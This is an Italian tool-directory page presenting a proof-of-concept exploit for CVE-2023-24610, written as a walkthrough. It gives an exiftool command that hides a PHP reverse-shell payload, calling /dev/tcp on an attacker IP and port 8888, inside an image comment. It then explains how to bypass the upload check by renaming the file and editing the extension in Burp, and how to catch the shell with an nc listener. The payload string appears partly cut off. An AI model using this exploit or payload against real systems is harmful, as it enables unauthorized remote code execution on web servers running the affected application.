Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-24610 — Questa è una prova di concetto per CVE-2023-24610 | Kitploit
Strumenti/GitHubGitHub/abbisqq/cve-2023-24610
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHubabbisqq/cve-2023-24610

CVE-2023-24610

Questa è una prova di concetto per CVE-2023-24610

Vedi Repository
33 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-24610

Questa è una prova di concetto per CVE-2023-24610

Iniziamo creando un file poliglotta usando exiftool: exiftool -Comment="/dev/tcp/172.17.0.1/8888 <&1\''); ?>" avatar.png -o polyglot.php

nosh1

Cambiamo il file in png in modo che superi il controllo del front-end

nosh2

Dopo di che, avviamo un listener nc sulla porta 8888 per ricevere la shell.

nosh3

Il passo successivo è accedere all'applicazione e cliccare su setup

nosh4

In fondo alla pagina, vediamo un'area per il logo dell'esercitazione. Possiamo caricare un file usando il pulsante modifica sul lato destro

nosh5

Clicchiamo su modifica e poi su sfoglia, selezioniamo il file ".png" che abbiamo creato al primo passo

nosh6

Prima di cliccare su carica, ci assicuriamo di intercettare la richiesta con burp o qualcosa di simile. Clicchiamo su carica e in burp cambiamo l'estensione del file da "png" a "php"

nosh7

Disattiviamo l'intercettazione in modo che il nostro file venga caricato e controlliamo il listener nc che abbiamo avviato prima. Abbiamo una shell inversa e l'IP punta al nostro container docker.

nosh8

Scarica lo strumento